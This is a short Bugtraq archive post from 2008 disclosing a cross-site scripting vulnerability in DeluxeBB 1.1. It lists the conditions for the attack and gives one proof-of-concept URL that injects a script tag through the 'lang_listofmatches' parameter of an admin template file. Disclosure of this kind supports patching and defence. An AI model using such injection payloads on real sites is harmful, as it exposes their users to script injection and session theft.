Bugtraq mailing list archives

DeluxeBB 1.1 XSS Vulnerabilitie


From: nbbn () gmx net
Date: Tue, 22 Jan 2008 18:07:53 +0100

########################################################
#Founded: 21, January 2008                             
#Autor: NBBN                                           
#Type: XSS                                             
#DeluxeBB Version: 1.1                                 
#Register Globals: ON                                  
#Magic Quotes; OFF                                     
########################################################

poc:

http://www.site.tld/path/templates/default/admincp/attachments_header.php?lang_listofmatches=<script>alert("XSS")</script>


Current thread: